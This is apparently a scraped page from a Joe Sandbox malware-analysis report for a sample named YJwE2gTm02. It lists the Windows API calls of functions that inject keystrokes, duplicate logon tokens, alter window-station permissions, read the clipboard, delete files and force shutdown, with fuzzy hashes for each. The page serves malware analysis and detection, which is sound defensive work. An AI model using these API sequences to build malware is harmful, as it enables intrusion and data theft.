Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F
API String ID: 3429851547-4164748364
Opcode ID: 2639873180f40ce90738c4600ded9b3c915c5cc523b4921e0c50b20d3e25cecf
Instruction ID: 694a1128570520d4753fbcd07412797f32a76cff2670f967f0a40f64ab040de1
Opcode Fuzzy Hash: 2639873180f40ce90738c4600ded9b3c915c5cc523b4921e0c50b20d3e25cecf
Instruction Fuzzy Hash: C8428E75208241AFDB24CF6CCC54BAABBE9FF89314F140A1EF599872A1D731E890DB51

Function 00994873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 009948F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00994908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00994927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0099494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0099495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0099497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 009949AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 009949D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00994A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00994A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00994A7E
IsMenu.USER32(?), ref: 00994A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00994AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00994B20
GetWindowLongW.USER32(?,000000F0), ref: 00994B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00994BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00994C82
wsprintfW.USER32 ref: 00994CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00994CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 00994CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00994D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00994D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 00994D5A

Strings

%d/%02d/%02d, xrefs: 00994CA8

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: 2ecee11876ec3567046ff9faa959346d54a77fc1bb8d5bfbf3c4b038709509ea
Instruction ID: 34a7a689e67d32d78dbea60f5a72a832e470a7db43e731a2fbc4cf5b97226e35
Opcode Fuzzy Hash: 2ecee11876ec3567046ff9faa959346d54a77fc1bb8d5bfbf3c4b038709509ea
Instruction Fuzzy Hash: BC12D071600219ABEF268F28CC49FAE7BF8EF85710F144529F516DB2E1DB749942CB50

Function 0091F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0091F998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0095F474
IsIconic.USER32(00000000), ref: 0095F47D
ShowWindow.USER32(00000000,00000009), ref: 0095F48A
SetForegroundWindow.USER32(00000000), ref: 0095F494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0095F4AA
GetCurrentThreadId.KERNEL32 ref: 0095F4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0095F4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 0095F4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0095F4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0095F4DE
SetForegroundWindow.USER32(00000000), ref: 0095F4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 0095F4F6
keybd_event.USER32(00000012,00000000), ref: 0095F501
MapVirtualKeyW.USER32(00000012,00000000), ref: 0095F50B
keybd_event.USER32(00000012,00000000), ref: 0095F510
MapVirtualKeyW.USER32(00000012,00000000), ref: 0095F519
keybd_event.USER32(00000012,00000000), ref: 0095F51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 0095F528
keybd_event.USER32(00000012,00000000), ref: 0095F52D
SetForegroundWindow.USER32(00000000), ref: 0095F530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 0095F557

Strings

Shell_TrayWnd, xrefs: 0095F46F

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 5d71fd9d68a4ed80e6339a33c4e0256ebe6d17598bcf2372e46dd5b6c1479fdd
Instruction ID: af71bed595f62c5f5751cf35e8e18ebecd1b8968b4eaf2a7f981fa0af506cd72
Opcode Fuzzy Hash: 5d71fd9d68a4ed80e6339a33c4e0256ebe6d17598bcf2372e46dd5b6c1479fdd
Instruction Fuzzy Hash: D531A6B1A54318BFEB206BBA5C4AFBF7E6CEB44B51F100426FA00E61D1D6B05D01BB61

Function 00961201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 009616C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0096170D
Part of subcall function 009616C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0096173A
Part of subcall function 009616C3: GetLastError.KERNEL32 ref: 0096174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00961286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 009612A8
CloseHandle.KERNEL32(?), ref: 009612B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 009612D1
GetProcessWindowStation.USER32 ref: 009612EA
SetProcessWindowStation.USER32(00000000), ref: 009612F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00961310

Part of subcall function 009610BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009611FC), ref: 009610D4
Part of subcall function 009610BF: CloseHandle.KERNEL32(?,?,009611FC), ref: 009610E9

Strings

, xrefs: 0096125A
default, xrefs: 0096130B
winsta0, xrefs: 009612CC

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: 759ed737bbbcc4d5f642a5808b2ed26d451f89491feab39d15e122089517cdbb
Instruction ID: 5f1d2a2296d3803beed56bc21bbadc5a45fbf312c391778e37e5753b6ed96331
Opcode Fuzzy Hash: 759ed737bbbcc4d5f642a5808b2ed26d451f89491feab39d15e122089517cdbb
Instruction Fuzzy Hash: DC81BBB1900209AFDF209FA8DC49FEE7BBDEF44704F18412AF910E62A0CB318944DB25

Function 00960B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009610F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00961114
Part of subcall function 009610F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00960B9B,?,?,?), ref: 00961120
Part of subcall function 009610F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00960B9B,?,?,?), ref: 0096112F
Part of subcall function 009610F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00960B9B,?,?,?), ref: 00961136
Part of subcall function 009610F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0096114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00960BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00960C00
GetLengthSid.ADVAPI32(?), ref: 00960C17
GetAce.ADVAPI32(?,00000000,?), ref: 00960C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00960C6D
GetLengthSid.ADVAPI32(?), ref: 00960C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00960C8C
HeapAlloc.KERNEL32(00000000), ref: 00960C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00960CB4
CopySid.ADVAPI32(00000000), ref: 00960CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00960CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00960D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00960D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00960D45
HeapFree.KERNEL32(00000000), ref: 00960D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00960D55
HeapFree.KERNEL32(00000000), ref: 00960D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00960D65
HeapFree.KERNEL32(00000000), ref: 00960D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 00960D78
HeapFree.KERNEL32(00000000), ref: 00960D7F

Part of subcall function 00961193: GetProcessHeap.KERNEL32(00000008,00960BB1,?,00000000,?,00960BB1,?), ref: 009611A1
Part of subcall function 00961193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00960BB1,?), ref: 009611A8
Part of subcall function 00961193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00960BB1,?), ref: 009611B7

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 673870c32d3666e8fbf6367d0ea47e89763e686d97f4a6a40656cc48eecb5239
Instruction ID: 5a00d4f3d1dcd22e38e40ac0c265951c9cc5b522213bdb3c4c95c468059a7a36
Opcode Fuzzy Hash: 673870c32d3666e8fbf6367d0ea47e89763e686d97f4a6a40656cc48eecb5239
Instruction Fuzzy Hash: 55715AB290420AAFDF10DFA8DC85BAFBBBCBF45300F044616E915A7191D775AA05DB60

Function 0097EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0099CC08), ref: 0097EB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 0097EB37
GetClipboardData.USER32(0000000D), ref: 0097EB43
CloseClipboard.USER32 ref: 0097EB4F
GlobalLock.KERNEL32(00000000), ref: 0097EB87
CloseClipboard.USER32 ref: 0097EB91
GlobalUnlock.KERNEL32(00000000), ref: 0097EBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 0097EBC9
GetClipboardData.USER32(00000001), ref: 0097EBD1
GlobalLock.KERNEL32(00000000), ref: 0097EBE2
GlobalUnlock.KERNEL32(00000000), ref: 0097EC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 0097EC38
GetClipboardData.USER32(0000000F), ref: 0097EC44
GlobalLock.KERNEL32(00000000), ref: 0097EC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0097EC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0097EC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0097ECD2
GlobalUnlock.KERNEL32(00000000), ref: 0097ECF3
CountClipboardFormats.USER32 ref: 0097ED14
CloseClipboard.USER32 ref: 0097ED59

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: a9fbb30a284f9172ff0c4eb8ca2995ade168fe9c8032481bae518c876030e034
Instruction ID: 22e163279ebe94524e86bdc9281dfaa818972f5eaea7aa021653fd5c76dd9f7a
Opcode Fuzzy Hash: a9fbb30a284f9172ff0c4eb8ca2995ade168fe9c8032481bae518c876030e034
Instruction Fuzzy Hash: 5161C4762082019FD310EF28DC85F2A7BE8AF88704F54855AF45A972E2DB31DD05DB62

Function 0097698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 009769BE
FindClose.KERNEL32(00000000), ref: 00976A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00976A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00976A75

Part of subcall function 00909CB3: _wcslen.LIBCMT ref: 00909CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 00976AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00976ADF

Strings

%4d, xrefs: 00976BB1
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00976B32
%02d, xrefs: 00976C00, 00976C0A, 00976C5A, 00976CAA, 00976CFA, 00976D4A
%4d%02d%02d%02d%02d%02d, xrefs: 00976B6A
%03d, xrefs: 00976DA2

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: be3ce1fb4150336a4ff327bb5ea5cf3db4a0241497e2bf497290cd70d515d64b
Instruction ID: 620ae7f59b501b307c5ca1ad898a5f812b31d79ed9d60551b29217e675a72db8
Opcode Fuzzy Hash: be3ce1fb4150336a4ff327bb5ea5cf3db4a0241497e2bf497290cd70d515d64b
Instruction Fuzzy Hash: 1FD15FB2908344AFC714EBA4C991EABB7ECAFC8704F44491DF589D7191EB34DA44CB62

Function 00979642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00979663
GetFileAttributesW.KERNEL32(?), ref: 009796A1
SetFileAttributesW.KERNEL32(?,?), ref: 009796BB
FindNextFileW.KERNEL32(00000000,?), ref: 009796D3
FindClose.KERNEL32(00000000), ref: 009796DE
FindFirstFileW.KERNEL32(*.*,?), ref: 009796FA
SetCurrentDirectoryW.KERNEL32(?), ref: 0097974A
SetCurrentDirectoryW.KERNEL32(009C6B7C), ref: 00979768
FindNextFileW.KERNEL32(00000000,00000010), ref: 00979772
FindClose.KERNEL32(00000000), ref: 0097977F
FindClose.KERNEL32(00000000), ref: 0097978F

Strings

*.*, xrefs: 009796F5

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: e0b5ea6a09f2f96ee29246cf360f30ad2a467fbd46799fd6d179a2a054f9e28b
Instruction ID: c0ca29fc8caeb014ae08d19e30680ae211c699b1514a7beae1d61748c714edd9
Opcode Fuzzy Hash: e0b5ea6a09f2f96ee29246cf360f30ad2a467fbd46799fd6d179a2a054f9e28b
Instruction Fuzzy Hash: CB31B372545219AFDF14EFB8EC49EDE77ACEF49320F108156F819E21A0EB34DE448A24

Function 0097979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 009797BE
FindNextFileW.KERNEL32(00000000,?), ref: 00979819
FindClose.KERNEL32(00000000), ref: 00979824
FindFirstFileW.KERNEL32(*.*,?), ref: 00979840
SetCurrentDirectoryW.KERNEL32(?), ref: 00979890
SetCurrentDirectoryW.KERNEL32(009C6B7C), ref: 009798AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 009798B8
FindClose.KERNEL32(00000000), ref: 009798C5
FindClose.KERNEL32(00000000), ref: 009798D5

Part of subcall function 0096DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0096DB00

Strings

*.*, xrefs: 0097983B

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 010a22f6710289b27926c619f50100d732c5c60df3e8f194b9cccbe2a4b2a213
Instruction ID: 3c92eb7c5ed6465f88edc29092c8d1c2ed4d7876fa4d8e0de71982b302a6b01d
Opcode Fuzzy Hash: 010a22f6710289b27926c619f50100d732c5c60df3e8f194b9cccbe2a4b2a213
Instruction Fuzzy Hash: EF31C3725456197FDF10EFB8EC49EDE77ACEF4A324F148196E828A21D0DB30DD448A21

Function 00978195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00978257
SystemTimeToFileTime.KERNEL32(?,?), ref: 00978267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00978273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00978310
SetCurrentDirectoryW.KERNEL32(?), ref: 00978324
SetCurrentDirectoryW.KERNEL32(?), ref: 00978356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0097838C
SetCurrentDirectoryW.KERNEL32(?), ref: 00978395

Strings

*.*, xrefs: 0097839B

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: e51f1d42f314f50ce37c81b977f74b4989e141e25ea60d9e76326f0f15786885
Instruction ID: 8f35702803784e0c6465b3569a98f28c6870e4192c7080e7fd3914a7d7ee5381
Opcode Fuzzy Hash: e51f1d42f314f50ce37c81b977f74b4989e141e25ea60d9e76326f0f15786885
Instruction Fuzzy Hash: 586168B25083059FCB10EF64C844AAFB3E8FF89314F04891EF99997251EB31E945CB92

Function 0096D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00903AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00903A97,?,?,00902E7F,?,?,?,00000000), ref: 00903AC2

Part of subcall function 0096E199: GetFileAttributesW.KERNEL32(?,0096CF95), ref: 0096E19A

FindFirstFileW.KERNEL32(?,?), ref: 0096D122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0096D1DD
MoveFileW.KERNEL32(?,?), ref: 0096D1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 0096D20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 0096D237

Part of subcall function 0096D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0096D21C,?,?), ref: 0096D2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 0096D253
FindClose.KERNEL32(00000000), ref: 0096D264

Strings

\*.*, xrefs: 0096D0CD, 0096D0D6, 0096D0EB

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: dfd9fec828d0698bcf2e9807ae4a6f25e14eb8d01eab3a6792c4337a61788b6d
Instruction ID: c6f334ab5e74345894a2737d4d2728b20c142b4b7bf58684342d340a32ddb6d4
Opcode Fuzzy Hash: dfd9fec828d0698bcf2e9807ae4a6f25e14eb8d01eab3a6792c4337a61788b6d
Instruction Fuzzy Hash: C1615E71D0610D9FCF05EBA0CE92AEEB779AF95300F608165E42177192EB30AF09DB61

Function 0097ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0097ED91
EmptyClipboard.USER32 ref: 0097ED97
GlobalAlloc.KERNEL32(00000002,?), ref: 0097EDAC
CloseClipboard.USER32 ref: 0097EEA3

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 46ab6b50c310406da3a04a44b417a0b3c62b3e09ecaa58e90f6ab44f1529c682
Instruction ID: b8c067a9c8a4e16f9233bb125352e63cce355d0a444bcca72e03e1e127b54010
Opcode Fuzzy Hash: 46ab6b50c310406da3a04a44b417a0b3c62b3e09ecaa58e90f6ab44f1529c682
Instruction Fuzzy Hash: 7541A376608611AFD720DF19E849F19BBE5FF48318F14C49AE4198B6A2C735EC41CB91

Function 0096E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 009616C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0096170D
Part of subcall function 009616C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0096173A
Part of subcall function 009616C3: GetLastError.KERNEL32 ref: 0096174A

ExitWindowsEx.USER32(?,00000000), ref: 0096E932

Strings

, xrefs: 0096E920
, xrefs: 0096E95C
@, xrefs: 0096E925
SeShutdownPrivilege, xrefs: 0096E902

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity
